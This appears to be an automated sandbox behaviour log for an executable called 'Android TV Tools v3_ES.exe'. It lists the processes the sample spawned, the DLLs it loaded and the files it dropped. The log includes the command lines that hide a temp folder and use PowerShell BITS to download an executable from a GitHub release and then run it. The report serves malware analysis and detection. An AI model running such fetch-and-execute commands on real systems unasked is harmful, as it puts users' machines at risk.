Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmpJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\ytmpJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999Jump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exeSection loaded: apphelp.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_0040B641 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040B641
Source: BITC7F8.tmp.12.drStatic PE information: real checksum: 0x0 should be: 0xe0ce
Source: Android TV Tools v3_ES.exeStatic PE information: real checksum: 0x1c605 should be: 0x6f1cc
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_00405810 push eax; ret 0_2_0040583E

Persistence and Installation Behavior

barindex
Powershell uses Background Intelligent Transfer Service (BITS)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls32\BitsProxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\Desktop\Android TV Tools - Aux Files\BITC7F8.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe (copy)Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
